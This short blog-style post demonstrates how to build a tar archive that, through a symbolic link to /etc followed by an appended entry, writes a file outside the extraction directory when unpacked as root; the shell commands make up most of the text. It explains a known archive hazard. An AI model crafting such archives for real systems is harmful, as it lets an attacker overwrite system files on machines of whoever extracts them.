.tgz that bytes
The following creates a tar file that writes stuff (
/etc/yourpasswdin this case) outside the directory where it is extracted:
touch foo.c bar.c Makefile ln -s /etc info # tar can do symbolic links tar cf src.tar *.c Makefile info rm info mkdir info touch info/yourpasswd # where does this extract? tar rf src.tar info/yourpasswd # tar can extend archives gzip -9 src.tar
This of course only works when
tar zxfis run as
root, but that is not unheard of, right?